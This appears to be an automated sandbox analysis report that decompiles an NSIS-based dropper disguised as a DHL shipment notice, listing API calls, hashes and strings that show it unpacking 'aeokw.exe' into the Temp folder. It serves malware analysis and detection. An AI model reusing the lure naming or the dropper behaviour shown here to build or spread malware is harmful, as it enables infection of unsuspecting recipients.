                        • SetWindowTextW.USER32(?,007A1F88), ref: 00404453
                        • ShowWindow.USER32(?,0000000A), ref: 00404587
                        Memory Dump Source
                        • Source File: 00000000.00000002.270931837.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.270922878.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.270947538.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.270955447.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.270961651.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.271408505.000000000077C000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.271418700.0000000000782000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.271429193.0000000000786000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.271439175.0000000000789000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.271484723.00000000007A6000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.271497474.00000000007B3000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.271512211.00000000007B9000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_DHL SHIPMENT NOTIFICATION 1146789443.jbxd
                        Similarity
                        • API ID: Window$Item$MessageSendShow$Enable$LongMenu$CallbackDestroyDispatcherEnabledSystemTextUserlstrlen
                        • String ID:
                        • API String ID: 2475350683-0
                        • Opcode ID: c3199f5d2ce6d65744aaa9316b253cb325a561f7dca841ae501f2507a703712f
                        • Instruction ID: f65a6081c11fa3fb00f54a078e57315272211b1d7c342d1bec1514082707246b
                        • Opcode Fuzzy Hash: c3199f5d2ce6d65744aaa9316b253cb325a561f7dca841ae501f2507a703712f
                        • Instruction Fuzzy Hash: 63C1ADB1500204BFDB216F65EE49E2A3AA8EBC6745F00853EF741B55E0CB3D5851DB2E
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Control-flow Graph

                        • control_flow_graph for function 403d1d (nodes 248 to 318); graph image not recoverable
                        C-Code - Quality: 96%
                        			E00403D1D(void* __eflags) {
                        				intOrPtr _v4;
                        				intOrPtr _v8;
                        				int _v12;
                        				void _v16;
                        				void* __ebx;
                        				void* __edi;
                        				void* __esi;
                        				intOrPtr* _t22;
                        				void* _t30;
                        				void* _t32;
                        				int _t33;
                        				void* _t36;
                        				int _t39;
                        				int _t40;
                        				int _t44;
                        				short _t63;
                        				WCHAR* _t65;
                        				signed char _t69;
                        				signed short _t73;
                        				WCHAR* _t76;
                        				intOrPtr _t82;
                        				WCHAR* _t87;
                        
                        				_t82 =  *0x7a8ab0;
                        				_t22 = E00406A3B(2);
                        				_t90 = _t22;
                        				if(_t22 == 0) {
                        					_t76 = 0x7a1f88;
                        					L"1033" = 0x30;
                        					 *0x7b5002 = 0x78;
                        					 *0x7b5004 = 0;
                        					E0040653C(_t78, __eflags, 0x80000001, L"Control Panel\\Desktop\\ResourceLocale", 0, 0x7a1f88, 0);
                        					__eflags =  *0x7a1f88;
                        					if(__eflags == 0) {
                        						E0040653C(_t78, __eflags, 0x80000003, L".DEFAULT\\Control Panel\\International",  &M004083D4, 0x7a1f88, 0);
                        					}
                        					lstrcatW(L"1033", _t76);
                        				} else {
                        					_t73 =  *_t22(); // executed
                        					E004065B5(L"1033", _t73 & 0x0000ffff);
                        				}
                        				E00403FF3(_t78, _t90);
                        				_t86 = L"C:\\Users\\jones\\AppData\\Local\\Temp";
                        				 *0x7a8b20 =  *0x7a8ab8 & 0x00000020;
                        				 *0x7a8b3c = 0x10000;
                        				if(E00406045(_t90, L"C:\\Users\\jones\\AppData\\Local\\Temp") != 0) {
                        					L16:
                        					if(E00406045(_t98, _t86) == 0) {
                        						E004066AB(_t76, 0, _t82, _t86,  *((intOrPtr*)(_t82 + 0x118)));
                        					}
                        					_t30 = LoadImageW( *0x7a8aa0, 0x67, 1, 0, 0, 0x8040); // executed
                        					 *0x7a7a88 = _t30;
                        					if( *((intOrPtr*)(_t82 + 0x50)) == 0xffffffff) {
                        						L21:
                        						if(E0040140B(0) == 0) {
                        							_t32 = E00403FF3(_t78, __eflags);
                        							__eflags =  *0x7a8b40;
                        							if( *0x7a8b40 != 0) {
                        								_t33 = E004057A3(_t32, 0);
                        								__eflags = _t33;
                        								if(_t33 == 0) {
                        									E0040140B(1);
                        									goto L33;
                        								}
                        								__eflags =  *0x7a7a6c;
                        								if( *0x7a7a6c == 0) {
                        									E0040140B(2);
                        								}
                        								goto L22;
                        							}
                        							ShowWindow( *0x7a1f68, 5); // executed
                        							_t39 = E004069CB("RichEd20"); // executed
                        							__eflags = _t39;
                        							if(_t39 == 0) {
                        								E004069CB("RichEd32");
                        							}
                        							_t87 = L"RichEdit20W";
                        							_t40 = GetClassInfoW(0, _t87, 0x7a7a40);
                        							__eflags = _t40;
                        							if(_t40 == 0) {
                        								GetClassInfoW(0, L"RichEdit", 0x7a7a40);
                        								 *0x7a7a64 = _t87;
                        								RegisterClassW(0x7a7a40);
                        							}
                        							_t44 = DialogBoxParamW( *0x7a8aa0,  *0x7a7a80 + 0x00000069 & 0x0000ffff, 0, E004040CB, 0); // executed
                        							E00403C6D(E0040140B(5), 1);
                        							return _t44;
                        						}
                        						L22:
                        						_t36 = 2;
                        						return _t36;
                        					} else {
                        						_t78 =  *0x7a8aa0;
                        						 *0x7a7a44 = E00401000;
                        						 *0x7a7a50 =  *0x7a8aa0;
                        						 *0x7a7a54 = _t30;
                        						 *0x7a7a64 = 0x40a3b4;
                        						if(RegisterClassW(0x7a7a40) == 0) {
                        							L33:
                        							__eflags = 0;
                        							return 0;
                        						}
                        						SystemParametersInfoW(0x30, 0,  &_v16, 0);
                        						 *0x7a1f68 = CreateWindowExW(0x80, 0x40a3b4, 0, 0x80000000, _v16, _v12, _v8 - _v16, _v4 - _v12, 0, 0,  *0x7a8aa0, 0);
                        						goto L21;
                        					}
                        				} else {
                        					_t78 =  *(_t82 + 0x48);
                        					_t92 = _t78;
                        					if(_t78 == 0) {
                        						goto L16;
                        					}
                        					_t76 = 0x7a6a40;
                        					E0040653C(_t78, _t92,  *((intOrPtr*)(_t82 + 0x44)),  *0x7a8ad8 + _t78 * 2,  *0x7a8ad8 +  *(_t82 + 0x4c) * 2, 0x7a6a40, 0);
                        					_t63 =  *0x7a6a40; // 0x43
                        					if(_t63 == 0) {
                        						goto L16;
                        					}
                        					if(_t63 == 0x22) {
                        						_t76 = 0x7a6a42;
                        						 *((short*)(E00405F6A(0x7a6a42, 0x22))) = 0;
                        					}
                        					_t65 = _t76 + lstrlenW(_t76) * 2 - 8;
                        					if(_t65 <= _t76 || lstrcmpiW(_t65, L".exe") != 0) {
                        						L15:
                        						E0040666E(_t86, E00405F3D(_t76));
                        						goto L16;
                        					} else {
                        						_t69 = GetFileAttributesW(_t76);
                        						if(_t69 == 0xffffffff) {
                        							L14:
                        							E00405F89(_t76);
                        							goto L15;
                        						}
                        						_t98 = _t69 & 0x00000010;
                        						if((_t69 & 0x00000010) != 0) {
                        							goto L15;
                        						}
                        						goto L14;
                        					}
                        				}
                        			}

                        APIs
                          • Part of subcall function 00406A3B: GetModuleHandleA.KERNEL32(?,00000020,?,00403756,0000000B), ref: 00406A4D
                          • Part of subcall function 00406A3B: GetProcAddress.KERNEL32(00000000,?), ref: 00406A68
                        • GetUserDefaultUILanguage.KERNELBASE(00000002,76CDFAA0,C:\Users\user\AppData\Local\Temp\,?,00000000,?), ref: 00403D37
                          • Part of subcall function 004065B5: wsprintfW.USER32 ref: 004065C2
                        • lstrcatW.KERNEL32(1033,007A1F88), ref: 00403D9E
                        • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\aeokw.exe C:\Users\user\AppData\Local\Temp\fnnok,?,?,?,C:\Users\user\AppData\Local\Temp\aeokw.exe C:\Users\user\AppData\Local\Temp\fnnok,00000000,C:\Users\user\AppData\Local\Temp,1033,007A1F88,80000001,Control Panel\Desktop\ResourceLocale,00000000,007A1F88,00000000,00000002,76CDFAA0), ref: 00403E1E
                        • lstrcmpiW.KERNEL32(?,.exe,C:\Users\user\AppData\Local\Temp\aeokw.exe C:\Users\user\AppData\Local\Temp\fnnok,?,?,?,C:\Users\user\AppData\Local\Temp\aeokw.exe C:\Users\user\AppData\Local\Temp\fnnok,00000000,C:\Users\user\AppData\Local\Temp,1033,007A1F88,80000001,Control Panel\Desktop\ResourceLocale,00000000,007A1F88,00000000), ref: 00403E31
                        • GetFileAttributesW.KERNEL32(C:\Users\user\AppData\Local\Temp\aeokw.exe C:\Users\user\AppData\Local\Temp\fnnok,?,00000000,?), ref: 00403E3C
                        • LoadImageW.USER32 ref: 00403E85
                        • RegisterClassW.USER32 ref: 00403EC2
                        • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403EDA
                        • CreateWindowExW.USER32 ref: 00403F0F
                        • ShowWindow.USER32(00000005,00000000,?,00000000,?), ref: 00403F45
                        • GetClassInfoW.USER32 ref: 00403F71
                        • GetClassInfoW.USER32 ref: 00403F7E
                        • RegisterClassW.USER32 ref: 00403F87
                        • DialogBoxParamW.USER32 ref: 00403FA6
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.270931837.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.270922878.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.270947538.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.270955447.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.270961651.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.271408505.000000000077C000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.271418700.0000000000782000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.271429193.0000000000786000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.271439175.0000000000789000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.271484723.00000000007A6000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.271497474.00000000007B3000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.271512211.00000000007B9000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_DHL SHIPMENT NOTIFICATION 1146789443.jbxd
                        Similarity
                        • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDefaultDialogFileHandleImageLanguageLoadModuleParamParametersProcShowSystemUserlstrcatlstrcmpilstrlenwsprintf
                        • String ID: .DEFAULT\Control Panel\International$.exe$1033$@zz$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\aeokw.exe C:\Users\user\AppData\Local\Temp\fnnok$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                        • API String ID: 606308-1545440408
                        • Opcode ID: 13dc47a7a0bb2ebca6ba8b70f4dc1bd23eb177df04af224418cffa241dba538e
                        • Instruction ID: b3798c48b8e7ed104fde3a001c8dc5b3ad58c50dca8dc7adab70101e5acdd628
                        • Opcode Fuzzy Hash: 13dc47a7a0bb2ebca6ba8b70f4dc1bd23eb177df04af224418cffa241dba538e
                        • Instruction Fuzzy Hash: 6561C170640200BED620AF669D46F2B3A6CEBC5B45F40853FF941B62E2DB7D8901CB6D
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Control-flow Graph

                        • control_flow_graph for function 4030d0 (nodes 321 to 387); graph image not recoverable
                        C-Code - Quality: 97%
                        			E004030D0(void* __eflags, signed int _a4) {
                        				long _v8;
                        				long _v12;
                        				intOrPtr _v16;
                        				long _v20;
                        				intOrPtr _v24;
                        				intOrPtr _v28;
                        				intOrPtr _v32;
                        				intOrPtr _v36;
                        				signed int _v40;
                        				short _v560;
                        				long _t54;
                        				void* _t57;
                        				void* _t61;
                        				intOrPtr _t64;
                        				void* _t67;
                        				intOrPtr* _t69;
                        				long _t81;
                        				signed int _t88;
                        				intOrPtr _t91;
                        				void* _t94;
                        				void* _t99;
                        				void* _t103;
                        				long _t104;
                        				long _t107;
                        				void* _t108;
                        
                        				_v8 = 0;
                        				_v12 = 0;
                        				 *0x7a8aac = GetTickCount() + 0x3e8;
                        				GetModuleFileNameW(0, L"C:\\Users\\jones\\Desktop\\DHL SHIPMENT NOTIFICATION 1146789443.exe", 0x400);
                        				_t103 = E0040615E(L"C:\\Users\\jones\\Desktop\\DHL SHIPMENT NOTIFICATION 1146789443.exe", 0x80000000, 3);
                        				 *0x40a018 = _t103;
                        				if(_t103 == 0xffffffff) {
                        					return L"Error launching installer";
                        				}
                        				E0040666E(L"C:\\Users\\jones\\Desktop", L"C:\\Users\\jones\\Desktop\\DHL SHIPMENT NOTIFICATION 1146789443.exe");
                        				E0040666E(0x7b7000, E00405F89(L"C:\\Users\\jones\\Desktop"));
                        				_t54 = GetFileSize(_t103, 0);
                        				 *0x79f740 = _t54;
                        				_t107 = _t54;
                        				if(_t54 <= 0) {
                        					L22:
                        					E0040302E(1);
                        					_pop(_t94);
                        					if( *0x7a8ab4 == 0) {
                        						goto L30;
                        					}
                        					if(_v12 == 0) {
                        						L26:
                        						_t57 = GlobalAlloc(0x40, _v20); // executed
                        						_t108 = _t57;
                        						 *0x40ce78 = 0xb;
                        						 *0x40ce90 = 0; // executed
                        						E0040618D(_t94,  &_v560, L"C:\\Users\\jones\\AppData\\Local\\Temp\\"); // executed
                        						_t61 = CreateFileW( &_v560, 0xc0000000, 0, 0, 2, 0x4000100, 0); // executed
                        						 *0x40a01c = _t61;
                        						if(_t61 != 0xffffffff) {
                        							_t64 = E004035FE( *0x7a8ab4 + 0x1c);
                        							 *0x79f744 = _t64;
                        							 *0x79f738 = _t64 - ( !_v40 & 0x00000004) + _v16 - 0x1c; // executed
                        							_t67 = E00403377(_v16, 0xffffffff, 0, _t108, _v20); // executed
                        							if(_t67 == _v20) {
                        								 *0x7a8ab0 = _t108;
                        								 *0x7a8ab8 =  *_t108;
                        								if((_v40 & 0x00000001) != 0) {
                        									 *0x7a8abc =  *0x7a8abc + 1;
                        								}
                        								_t45 = _t108 + 0x44; // 0x44
                        								_t69 = _t45;
                        								_t99 = 8;
                        								do {
                        									_t69 = _t69 - 8;
                        									 *_t69 =  *_t69 + _t108;
                        									_t99 = _t99 - 1;
                        								} while (_t99 != 0);
                        								 *((intOrPtr*)(_t108 + 0x3c)) =  *0x79f734;
                        								E00406119(0x7a8ac0, _t108 + 4, 0x40);
                        								return 0;
                        							}
                        							goto L30;
                        						}
                        						return L"Error writing temporary file. Make sure your temp folder is valid.";
                        					}
                        					E004035FE( *0x79f730);
                        					if(E004035E8( &_a4, 4) == 0 || _v8 != _a4) {
                        						goto L30;
                        					} else {
                        						goto L26;
                        					}
                        				} else {
                        					do {
                        						_t104 = _t107;
                        						asm("sbb eax, eax");
                        						_t81 = ( ~( *0x7a8ab4) & 0x00007e00) + 0x200;
                        						if(_t107 >= _t81) {
                        							_t104 = _t81;
                        						}
                        						if(E004035E8(0x797730, _t104) == 0) {
                        							E0040302E(1);
                        							L30:
                        							return L"Installer integrity check has failed. Common causes include\nincomplete download and damaged media. Contact the\ninstaller\'s author to obtain a new copy.\n\nMore information at:\nhttp://nsis.sf.net/NSIS_Error";
                        						}
                        						if( *0x7a8ab4 != 0) {
                        							if((_a4 & 0x00000002) == 0) {
                        								E0040302E(0);
                        							}
                        							goto L19;
                        						}
                        						E00406119( &_v40, 0x797730, 0x1c);
                        						_t88 = _v40;
                        						if((_t88 & 0xfffffff0) == 0 && _v36 == 0xdeadbeef && _v24 == 0x74736e49 && _v28 == 0x74666f73 && _v32 == 0x6c6c754e) {
                        							_a4 = _a4 | _t88;
                        							 *0x7a8b40 =  *0x7a8b40 | _a4 & 0x00000002;
                        							_t91 = _v16;
                        							 *0x7a8ab4 =  *0x79f730;
                        							if(_t91 > _t107) {
                        								goto L30;
                        							}
                        							if((_a4 & 0x00000008) != 0 || (_a4 & 0x00000004) == 0) {
                        								_v12 = _v12 + 1;
                        								_t107 = _t91 - 4;
                        								if(_t104 > _t107) {
                        									_t104 = _t107;
                        								}
                        								goto L19;
                        							} else {
                        								goto L22;
                        							}
                        						}
                        						L19:
                        						if(_t107 <  *0x79f740) {
                        							_v8 = E00406B28(_v8, 0x797730, _t104);
                        						}
                        						 *0x79f730 =  *0x79f730 + _t104;
                        						_t107 = _t107 - _t104;
                        					} while (_t107 != 0);
                        					goto L22;
                        				}
                        			}





























                        APIs
                        • GetTickCount.KERNEL32 ref: 004030E4
                        • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\DHL SHIPMENT NOTIFICATION 1146789443.exe,00000400), ref: 00403100
                          • Part of subcall function 0040615E: GetFileAttributesW.KERNELBASE(00000003,00403113,C:\Users\user\Desktop\DHL SHIPMENT NOTIFICATION 1146789443.exe,80000000,00000003), ref: 00406162
                          • Part of subcall function 0040615E: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00406184
                        • GetFileSize.KERNEL32(00000000,00000000,007B7000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\DHL SHIPMENT NOTIFICATION 1146789443.exe,C:\Users\user\Desktop\DHL SHIPMENT NOTIFICATION 1146789443.exe,80000000,00000003), ref: 00403149
                        • GlobalAlloc.KERNELBASE(00000040,?), ref: 0040328E
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.270931837.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_DHL SHIPMENT NOTIFICATION 1146789443.jbxd
                        Similarity
                        • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                        • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\DHL SHIPMENT NOTIFICATION 1146789443.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                        • API String ID: 2803837635-3642876044
                        • Opcode ID: 323c9084f4495cb75f4cf70951988b51dd1d9d869199bcaf0981bfe9882d4e48
                        • Instruction ID: 583a998f33a1e047253031f1d22d0aa602d55a867c39f8e0fceec447792fd132
                        • Opcode Fuzzy Hash: 323c9084f4495cb75f4cf70951988b51dd1d9d869199bcaf0981bfe9882d4e48
                        • Instruction Fuzzy Hash: 0671E171940204ABCB20DFA5EE85A9E3FA8AB11316F10817FF900B62D1DB7C9E418B5D
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 454 40176f-401794 call 402da6 call 405fb4 459 401796-40179c call 40666e 454->459 460 40179e-4017b0 call 40666e call 405f3d lstrcatW 454->460 466 4017b5-4017b6 call 4068f5 459->466 460->466 469 4017bb-4017bf 466->469 470 4017c1-4017cb call 4069a4 469->470 471 4017f2-4017f5 469->471 478 4017dd-4017ef 470->478 479 4017cd-4017db CompareFileTime 470->479 473 4017f7-4017f8 call 406139 471->473 474 4017fd-401819 call 40615e 471->474 473->474 481 40181b-40181e 474->481 482 40188d-4018b6 call 4056d0 call 403377 474->482 478->471 479->478 483 401820-40185e call 40666e * 2 call 4066ab call 40666e call 405cce 481->483 484 40186f-401879 call 4056d0 481->484 496 4018b8-4018bc 482->496 497 4018be-4018ca SetFileTime 482->497 483->469 517 401864-401865 483->517 494 401882-401888 484->494 498 402c33 494->498 496->497 500 4018d0-4018db FindCloseChangeNotification 496->500 497->500 502 402c35-402c39 498->502 503 4018e1-4018e4 500->503 504 402c2a-402c2d 500->504 506 4018e6-4018f7 call 4066ab lstrcatW 503->506 507 4018f9-4018fc call 4066ab 503->507 504->498 511 401901-4023a2 call 405cce 506->511 507->511 511->502 511->504 517->494 519 401867-401868 517->519 519->484
                        C-Code - Quality: 77%
                        			E0040176F(FILETIME* __ebx, void* __eflags) {
                        				void* __esi;
                        				void* _t35;
                        				void* _t43;
                        				void* _t45;
                        				FILETIME* _t51;
                        				FILETIME* _t64;
                        				void* _t66;
                        				signed int _t72;
                        				FILETIME* _t73;
                        				FILETIME* _t77;
                        				signed int _t79;
                        				WCHAR* _t81;
                        				void* _t83;
                        				void* _t84;
                        				void* _t86;
                        
                        				_t77 = __ebx;
                        				 *(_t86 - 8) = E00402DA6(0x31);
                        				 *(_t86 + 8) =  *(_t86 - 0x30) & 0x00000007;
                        				_t35 = E00405FB4( *(_t86 - 8));
                        				_push( *(_t86 - 8));
                        				_t81 = L"C:\\U";
                        				if(_t35 == 0) {
                        					lstrcatW(E00405F3D(E0040666E(_t81, L"C:\\Users\\jones\\AppData\\Local\\Temp")), ??);
                        				} else {
                        					E0040666E();
                        				}
                        				E004068F5(_t81);
                        				while(1) {
                        					__eflags =  *(_t86 + 8) - 3;
                        					if( *(_t86 + 8) >= 3) {
                        						_t66 = E004069A4(_t81);
                        						_t79 = 0;
                        						__eflags = _t66 - _t77;
                        						if(_t66 != _t77) {
                        							_t73 = _t66 + 0x14;
                        							__eflags = _t73;
                        							_t79 = CompareFileTime(_t73, _t86 - 0x24);
                        						}
                        						asm("sbb eax, eax");
                        						_t72 =  ~(( *(_t86 + 8) + 0xfffffffd | 0x80000000) & _t79) + 1;
                        						__eflags = _t72;
                        						 *(_t86 + 8) = _t72;
                        					}
                        					__eflags =  *(_t86 + 8) - _t77;
                        					if( *(_t86 + 8) == _t77) {
                        						E00406139(_t81);
                        					}
                        					__eflags =  *(_t86 + 8) - 1;
                        					_t43 = E0040615E(_t81, 0x40000000, (0 |  *(_t86 + 8) != 0x00000001) + 1);
                        					__eflags = _t43 - 0xffffffff;
                        					 *(_t86 - 0x38) = _t43;
                        					if(_t43 != 0xffffffff) {
                        						break;
                        					}
                        					__eflags =  *(_t86 + 8) - _t77;
                        					if( *(_t86 + 8) != _t77) {
                        						E004056D0(0xffffffe2,  *(_t86 - 8));
                        						__eflags =  *(_t86 + 8) - 2;
                        						if(__eflags == 0) {
                        							 *((intOrPtr*)(_t86 - 4)) = 1;
                        						}
                        						L31:
                        						 *0x7a8b28 =  *0x7a8b28 +  *((intOrPtr*)(_t86 - 4));
                        						__eflags =  *0x7a8b28;
                        						goto L32;
                        					} else {
                        						E0040666E(0x40b5f8, _t83);
                        						E0040666E(_t83, _t81);
                        						E004066AB(_t77, _t81, _t83, "C:\Users\jones\AppData\Local\Temp",  *((intOrPtr*)(_t86 - 0x1c)));
                        						E0040666E(_t83, 0x40b5f8);
                        						_t64 = E00405CCE("C:\Users\jones\AppData\Local\Temp",  *(_t86 - 0x30) >> 3) - 4;
                        						__eflags = _t64;
                        						if(_t64 == 0) {
                        							continue;
                        						} else {
                        							__eflags = _t64 == 1;
                        							if(_t64 == 1) {
                        								 *0x7a8b28 =  &( *0x7a8b28->dwLowDateTime);
                        								L32:
                        								_t51 = 0;
                        								__eflags = 0;
                        							} else {
                        								_push(_t81);
                        								_push(0xfffffffa);
                        								E004056D0();
                        								L29:
                        								_t51 = 0x7fffffff;
                        							}
                        						}
                        					}
                        					L33:
                        					return _t51;
                        				}
                        				E004056D0(0xffffffea,  *(_t86 - 8));
                        				 *0x7a8b54 =  *0x7a8b54 + 1;
                        				_t45 = E00403377(_t79,  *((intOrPtr*)(_t86 - 0x28)),  *(_t86 - 0x38), _t77, _t77); // executed
                        				 *0x7a8b54 =  *0x7a8b54 - 1;
                        				__eflags =  *(_t86 - 0x24) - 0xffffffff;
                        				_t84 = _t45;
                        				if( *(_t86 - 0x24) != 0xffffffff) {
                        					L22:
                        					SetFileTime( *(_t86 - 0x38), _t86 - 0x24, _t77, _t86 - 0x24); // executed
                        				} else {
                        					__eflags =  *((intOrPtr*)(_t86 - 0x20)) - 0xffffffff;
                        					if( *((intOrPtr*)(_t86 - 0x20)) != 0xffffffff) {
                        						goto L22;
                        					}
                        				}
                        				FindCloseChangeNotification( *(_t86 - 0x38)); // executed
                        				__eflags = _t84 - _t77;
                        				if(_t84 >= _t77) {
                        					goto L31;
                        				} else {
                        					__eflags = _t84 - 0xfffffffe;
                        					if(_t84 != 0xfffffffe) {
                        						E004066AB(_t77, _t81, _t84, _t81, 0xffffffee);
                        					} else {
                        						E004066AB(_t77, _t81, _t84, _t81, 0xffffffe9);
                        						lstrcatW(_t81,  *(_t86 - 8));
                        					}
                        					_push(0x200010);
                        					_push(_t81);
                        					E00405CCE();
                        					goto L29;
                        				}
                        				goto L33;
                        			}



















                        APIs
                        • lstrcatW.KERNEL32(00000000,00000000), ref: 004017B0
                        • CompareFileTime.KERNEL32(-00000014,?,C:\Users\user\AppData\Local\Temp\aeokw.exe C:\Users\user\AppData\Local\Temp\fnnok,C:\Users\user\AppData\Local\Temp\aeokw.exe C:\Users\user\AppData\Local\Temp\fnnok,00000000,00000000,C:\Users\user\AppData\Local\Temp\aeokw.exe C:\Users\user\AppData\Local\Temp\fnnok,C:\Users\user\AppData\Local\Temp,?,?,00000031), ref: 004017D5
                          • Part of subcall function 0040666E: lstrcpynW.KERNEL32(?,?,00000400,004037B6,007A7AA0,NSIS Error), ref: 0040667B
                          • Part of subcall function 004056D0: lstrlenW.KERNEL32(007A0F68,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000,?), ref: 00405708
                          • Part of subcall function 004056D0: lstrlenW.KERNEL32(004030A8,007A0F68,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000), ref: 00405718
                          • Part of subcall function 004056D0: lstrcatW.KERNEL32(007A0F68,004030A8), ref: 0040572B
                          • Part of subcall function 004056D0: SetWindowTextW.USER32(007A0F68,007A0F68), ref: 0040573D
                          • Part of subcall function 004056D0: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405763
                          • Part of subcall function 004056D0: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040577D
                          • Part of subcall function 004056D0: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040578B
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.270931837.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_DHL SHIPMENT NOTIFICATION 1146789443.jbxd
                        Similarity
                        • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                        • String ID: C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\aeokw.exe C:\Users\user\AppData\Local\Temp\fnnok
                        • API String ID: 1941528284-2386481783
                        • Opcode ID: c88ed36c007d22437061545d9d5dec38a2b75a4754de15431c99bf9f19713014
                        • Instruction ID: c895feda3e823d9c0bc0fb7144dfd3dc41df657037fc16576ccee127d24ab7e8
                        • Opcode Fuzzy Hash: c88ed36c007d22437061545d9d5dec38a2b75a4754de15431c99bf9f19713014
                        • Instruction Fuzzy Hash: CB41D571800108BACF11BBB5DD85DAE7679EF45328F20463FF422B11E1DB3D89619A2E
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 520 40347f-4034a7 GetTickCount 521 4035d7-4035df call 40302e 520->521 522 4034ad-4034d8 call 4035fe SetFilePointer 520->522 527 4035e1-4035e5 521->527 528 4034dd-4034ef 522->528 529 4034f1 528->529 530 4034f3-403501 call 4035e8 528->530 529->530 533 403507-403513 530->533 534 4035c9-4035cc 530->534 535 403519-40351f 533->535 534->527 536 403521-403527 535->536 537 40354a-403566 call 406b96 535->537 536->537 538 403529-403549 call 40302e 536->538 543 4035d2 537->543 544 403568-403570 537->544 538->537 545 4035d4-4035d5 543->545 546 403572-40357a call 406210 544->546 547 403593-403599 544->547 545->527 551 40357f-403581 546->551 547->543 548 40359b-40359d 547->548 548->543 550 40359f-4035b2 548->550 550->528 552 4035b8-4035c7 SetFilePointer 550->552 553 403583-40358f 551->553 554 4035ce-4035d0 551->554 552->521 553->535 555 403591 553->555 554->545 555->550
                        C-Code - Quality: 93%
                        			E0040347F(intOrPtr _a4) {
                        				intOrPtr _t11;
                        				signed int _t12;
                        				void* _t15;
                        				long _t16;
                        				void* _t18;
                        				intOrPtr _t30;
                        				intOrPtr _t33;
                        				intOrPtr _t35;
                        				void* _t36;
                        				intOrPtr _t48;
                        
                        				_t33 =  *0x79f734 -  *0x40ce60 + _a4;
                        				 *0x7a8aac = GetTickCount() + 0x1f4;
                        				if(_t33 <= 0) {
                        					L22:
                        					E0040302E(1);
                        					return 0;
                        				}
                        				E004035FE( *0x79f744);
                        				SetFilePointer( *0x40a01c,  *0x40ce60, 0, 0); // executed
                        				 *0x79f740 = _t33;
                        				 *0x79f730 = 0;
                        				while(1) {
                        					_t30 = 0x4000;
                        					_t11 =  *0x79f738 -  *0x79f744;
                        					if(_t11 <= 0x4000) {
                        						_t30 = _t11;
                        					}
                        					_t12 = E004035E8(0x793730, _t30);
                        					if(_t12 == 0) {
                        						break;
                        					}
                        					 *0x79f744 =  *0x79f744 + _t30;
                        					 *0x40ce68 = 0x793730;
                        					 *0x40ce6c = _t30;
                        					L6:
                        					L6:
                        					if( *0x7a8ab0 != 0 &&  *0x7a8b40 == 0) {
